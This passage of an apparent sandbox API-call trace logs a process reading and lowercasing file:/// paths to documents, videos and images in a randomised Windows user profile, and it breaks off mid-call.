ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.829] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.830] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/neiWqsqWJb.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx" [0085.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned 61 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.830] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.830] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/bbUhdSEBOR_Wx0_Ly.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv" [0085.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned 64 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.830] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.830] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/dC0kKKMref9xs.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf" [0085.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned 60 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.830] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.830] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/2n_GtpyLH.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt" [0085.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 59 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.830] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.830] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.831] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/OhxNYKh_uFZ4.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif" [0085.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned 120 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.831] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.831] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/3sC0z1bfBrLsq.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt" [0085.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 63 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.831] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.831] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/G5VE1YbcAHaUz0t.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif" [0085.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 71 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.831] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.831] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/c9V5CWhsFouNZ.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png" [0085.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 78 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.831] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.831] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.832] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/lU_NzWrGi2SSxTfHhhg.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf" [0085.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned 66 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.832] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.832] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/kVgO2PS.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt" [0085.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned 76 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.832] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.832] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/w5qVDpAe9jrZ.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf" [0085.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 77 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.832] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.832] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/gXV2c5bZMUaI647PCLru.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx" [0085.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 90 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.832] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.832] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.832] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/xCj9P.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg" [0085.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned 63 [0085.833] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.833] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.833] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.833] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/28lAXbsQ3m50.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg" [0085.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned 125 [0085.833] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.833] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.833] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.833] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/uHTKQ-Tczvm9TDvXVw.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv" [0085.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 83 [0085.833] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.833] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/HbY7GwiJ.doc" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc" [0085.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 77 [0085.833] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.833] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/6FsHFfojtWSpRY33.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt" [0085.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 66 [0085.833] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.833] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/a3nE_YxUm0cLd.csv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv" [0085.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 82 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/v0uFl0Ag.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 73 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/ZWfvn9IebK6WZpaG.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 72 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/HDFQW%20QK5sILpA%20IO/0ivkoykEH0-Af8.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned 144 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/SHCJ2UKHhA9e2.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned 95 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/xQiySgiqzH.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 75 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/P0mmc6MKtCPT8JZ.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned 84 [0085.834] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.834] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/JbJbAyjAlmaQe.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg" [0085.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: 